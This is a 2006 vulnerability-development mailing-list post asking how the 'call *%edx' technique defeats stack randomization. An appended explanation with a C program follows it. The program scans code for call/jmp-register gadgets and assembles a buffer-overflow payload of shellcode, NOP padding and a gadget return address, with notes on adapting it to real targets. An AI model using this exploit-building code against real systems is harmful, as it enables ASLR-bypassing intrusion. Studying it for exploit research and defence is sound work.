Vulnerability Development mailing list archives

problem in bypassing stack randomization ("call *%edx" technique)


From: Pravin <shindepravin () gmail com>
Date: Mon, 18 Sep 2006 12:02:19 +0530

Hi,
I am working on vulnerabilities which will bypass stack randomization.
I came across a method ("call *%edx" technique) described in
http://rawlab.mindcreations.com/codes/exp/randstack/exp_call_rand.pl

As per my understanding, the method works along the lines of finding a library
which is not randomized,
then finding the instruction "call *%edx" in the assembly code of that
library,
and passing control to this instruction by overwriting the return address
with the address of this instruction from the non-randomized library.
I do understand that control will go to that function, but how can I control
the value of "*%edx"?
I know I can control the value of "*%esp", but how can I overwrite "*%edx"?
And if I don't control the value of "*%edx", then how will my shellcode get
executed?

I am missing something here. Please let me know if I am wrong
somewhere.
I would appreciate it if someone could give me a link to some detailed documentation
for the "call *%edx" technique, or some hint of how it works and how control passes
to the shellcode exactly.
Thanks.

--
Pravin Shinde
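The two mechanical steps the post describes, as an added example that is not part of the original message and not the code of exp_call_rand.pl: first, locate a register trampoline (`call *%reg` / `jmp *%reg`) in a mapping whose address does not change between runs; second, lay out an overflow payload with the shellcode at the start of the buffer and the gadget's address in the saved return slot. The point the post is asking about is the part a scanner cannot show: a register trampoline does not control %edx directly. It relies on the vulnerable function having left a pointer into the overflowed buffer in %edx as a side effect of its own copying code at the moment it executes `ret`, so `call *%edx` lands in attacker data. Which register, if any, still points at the buffer depends on the specific vulnerable function and compiler output, and has to be confirmed in a debugger at the `ret`. The code image, the load address 0x08048000, the offset 64 to the saved return address and the three-byte placeholder shellcode below are all constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Register numbers as encoded in the low 3 bits of the ModRM byte (x86-32). */
static const char *const reg_names[8] =
    { "eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi" };

struct gadget {
    uintptr_t addr;    /* virtual address of the two-byte gadget */
    int       is_call; /* 1 for call *%reg, 0 for jmp *%reg */
    int       reg;     /* 0..7, index into reg_names */
};

/*
 * Scan a code image for register trampolines: FF D0+r is `call *%reg`,
 * FF E0+r is `jmp *%reg` (opcode FF /2 and FF /4 with mod=11). x86 has no
 * instruction alignment, so a match inside a longer instruction is still a
 * usable gadget. `base` is the address image[0] is mapped at. Fills up to
 * `max` entries of `out` and returns the total number found.
 */
size_t find_reg_trampolines(const uint8_t *image, size_t len, uintptr_t base,
                            struct gadget *out, size_t max)
{
    size_t n = 0;
    for (size_t i = 0; i + 1 < len; i++) {
        if (image[i] != 0xFF)
            continue;
        uint8_t modrm = image[i + 1];
        int is_call;
        if ((modrm & 0xF8) == 0xD0)
            is_call = 1;
        else if ((modrm & 0xF8) == 0xE0)
            is_call = 0;
        else
            continue;
        if (n < max) {
            out[n].addr = base + i;
            out[n].is_call = is_call;
            out[n].reg = modrm & 7;
        }
        n++;
    }
    return n;
}

/*
 * Build a strcpy()-style overflow payload for a register trampoline:
 *   [shellcode][0x90 padding ...][gadget address, little-endian]
 * `ret_off` is the distance from the start of the overflowed buffer to the
 * saved return address. The shellcode sits at the buffer start because that
 * is where the trampolined register is expected to point. Returns the payload
 * length, or 0 if a NUL byte would end a strcpy() copy before the return slot
 * is fully written (the top address byte may be 0: strcpy() writes that one
 * itself as the terminator).
 */
size_t build_payload(const uint8_t *sc, size_t sc_len, size_t ret_off,
                     uint32_t gadget, uint8_t *out, size_t out_cap)
{
    size_t total = ret_off + 4;
    if (sc_len > ret_off || total > out_cap)
        return 0;
    if (memchr(sc, 0, sc_len) != NULL)
        return 0;
    for (int i = 0; i < 3; i++)
        if (((gadget >> (8 * i)) & 0xFF) == 0)
            return 0;
    memcpy(out, sc, sc_len);
    memset(out + sc_len, 0x90, ret_off - sc_len);
    for (int i = 0; i < 4; i++)
        out[ret_off + i] = (uint8_t)(gadget >> (8 * i));
    return total;
}

/* Constructed sample image (not real library code): prologue/epilogue-like
 * bytes with one `call *%edx`, one `jmp *%eax` and one memory-indirect call. */
static const uint8_t sample_image[] = {
    0x55, 0x89, 0xE5,                     /* push %ebp; mov %esp,%ebp */
    0xFF, 0xD2,                           /* call *%edx  <- the gadget in question */
    0xC3,                                 /* ret */
    0xFF, 0xE0,                           /* jmp *%eax */
    0x8B, 0x45, 0x08,                     /* mov 0x8(%ebp),%eax */
    0xFF, 0x15, 0x00, 0x10, 0x00, 0x00    /* call *0x1000 (not a register trampoline) */
};
/* Assumed load address, standing in for a non-randomized mapping. */
#define SAMPLE_BASE 0x08048000u

int main(void)
{
    struct gadget g[8];
    size_t n = find_reg_trampolines(sample_image, sizeof sample_image, SAMPLE_BASE, g, 8);
    for (size_t i = 0; i < n; i++)
        printf("%#lx: %s *%%%s\n", (unsigned long)g[i].addr,
               g[i].is_call ? "call" : "jmp", reg_names[g[i].reg]);

    /* Constructed placeholder shellcode: xor %eax,%eax; int3 */
    const uint8_t sc[] = { 0x31, 0xC0, 0xCC };
    uint8_t payload[128];
    size_t len = build_payload(sc, sizeof sc, 64, (uint32_t)g[0].addr, payload, sizeof payload);
    printf("payload length %zu, return slot = %02x %02x %02x %02x\n", len,
           payload[64], payload[65], payload[66], payload[67]);
    return 0;
}
```

On a real target the image passed to `find_reg_trampolines` would be the text segment of the non-randomized mapping read from disk or from /proc/PID/maps, and the candidate list is then filtered down to the one register that actually holds the buffer address at the vulnerable `ret`; the NUL checks in `build_payload` matter only for NUL-terminated copies such as strcpy(), and can be dropped for memcpy()-style overflows.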

